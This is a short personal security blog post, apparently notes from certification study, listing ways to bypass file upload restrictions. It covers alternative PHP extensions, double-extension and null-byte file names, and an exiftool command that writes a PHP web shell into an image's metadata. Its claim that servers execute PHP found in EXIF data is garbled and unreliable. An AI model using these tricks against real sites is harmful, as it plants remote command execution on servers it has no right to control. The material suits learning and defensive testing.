Josh Nutt

IT professional with 5+ years of experience, mostly building automation with PowerShell.

Currently studying Infrastructure as Code, Cyber Security, and Azure. Also working on CRTO and CRTP certifications.

When Im not studying Im probably hiking or playing Age of Empires 2.

Bypassing Upload Restrictions

less than 1 minute read

PHP has multiple alternative extensions:

phtml, .php, .php3, .php4, .php5, and .inc

It might be possible to upload and execute a .php file simply by renaming it file.php.jpg or file.PHp.

Add a null byte at the end

cp payload.php payload.php%00.jpg

Put a payload inside a jpg file, into the exgif data. Most web servers scan the file, and when it scans the file it executes the php data in the exgif file.

Use exiftool

exiftool -Comment="<?php system($_GET['cmd']); ?>" pic.jpg

Share on

Twitter Facebook LinkedIn

Converting the Maldev Academy OVA to Hyper-V

less than 1 minute read

Just a quick note for myself on converting the Maldev Academy OVA to Hyper-V

Constrained Delegation - Cobalt Strike and PowerView

less than 1 minute read

While working on the CRTO lab I wanted to try using PowerShell to find Constrained Delegation like I did in the CRTP course. They used PowerView, so I figur...

Persistence With DSRM And Mimikatz

1 minute read

We have domain admin, lets really sink our hook in and ensure persistence.

AS-REP Roast: PowerShell

less than 1 minute read

If a user’s UserAccountControl settings have Do Not Require Kerberos preauthentication enabled it is possible to grab user’s crackable AS-REP and brute-force...

Josh Nutt

Share on

You may also enjoy

Converting the Maldev Academy OVA to Hyper-V

Constrained Delegation - Cobalt Strike and PowerView

Persistence With DSRM And Mimikatz

AS-REP Roast: PowerShell